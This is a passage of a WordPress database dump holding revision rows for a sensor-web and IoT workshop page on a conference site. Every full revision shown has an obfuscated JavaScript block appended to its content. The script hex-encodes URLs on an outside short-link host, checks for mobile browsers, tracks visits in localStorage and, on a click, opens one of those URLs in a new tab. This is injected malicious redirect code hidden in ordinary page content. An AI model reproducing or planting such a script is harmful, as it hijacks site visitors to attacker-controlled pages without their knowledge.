_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:16:30','2022-12-06 05:16:30','',3386,'https://gsw2023.com/?p=3419',0,'revision','',0),
(3420,1,'2022-12-06 05:16:44','2022-12-06 05:16:44','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:16:44','2022-12-06 05:16:44','',3386,'https://gsw2023.com/?p=3420',0,'revision','',0),
(3421,1,'2022-12-06 05:17:54','2022-12-06 05:17:54','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<ul>\n<li>\n<h6>Fusion and integration of data from sensors, IoT devices, and crowd sources for supporting digital twins and smart cities.</h6>\n</li>\n<li>\n<h6>New methods and techniques (e.g., machine learning and deep learning based, decentralized processing, and edge computing) for analyzing, predicting, and simulating data from sensors, IoT devices, and crowd sources.</h6>\n</li>\n<li>\n<h6>Research on ethical use of and trust in data from ubiquitous sensors, IoT devices, crowdsourcing, and intelligent systems.</h6>\n</li>\n<li>\n<h6>Potential of sensor web, Internet of Things, crowdsourcing, participatory and intelligent systems for user-centered planning and decision support, situational awareness and emergency management.</h6>\n</li>\n<li>\n<h6>Efficient use of the data from sensors, IoT devices, crowdsourcing, and intelligent/participatory systems for supporting the implementation of UNs’ SDGs.</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:17:54','2022-12-06 05:17:54','',3386,'https://gsw2023.com/?p=3421',0,'revision','',0),
(3422,1,'2022-12-06 05:19:51','2022-12-06 05:19:51','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 